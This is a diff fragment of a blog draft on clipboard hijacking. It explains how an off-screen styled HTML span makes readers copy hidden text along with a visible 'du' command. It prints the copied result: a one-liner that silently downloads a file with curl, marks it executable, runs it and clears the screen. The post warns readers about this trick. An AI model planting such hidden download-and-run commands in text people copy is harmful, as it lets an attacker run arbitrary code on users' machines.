nickstanley574/nickstanley574.github.io/_drafts_public/2021-12-21-dont-trust-your-clipboard.md

 <p>Don't <b>ever</b> push the <b><span style="color:red">red</span> one</b>.</p>
 ```

-The `BadActor666` `<span>` contains the styling of `position: absolute; top: -200px; left: -200px;` which puts the text off screen in the upper left conner of the browser window.
+This allows us to add style to text, but browser allows the copy without the the format applied.
+The BadActor666 `<span>` contains the styling of `position: absolute; top: -200px; left: -200px;` which puts the text off screen in the upper left conner of the browser window.
 Even though you can't see it doesn't mean its not copied.
 When the `du` command is highlighted so is the text in the `<span>`.
 Here is what is copied to your clipboard.
 ```
 du -hs *; curl -s -L https://nickstanley574.github.io//assets/posts/dont-trust-your-clipboard/sl --output sl; chmod +x sl; ./sl; clear;
 du -hs * | sort -rh | head -5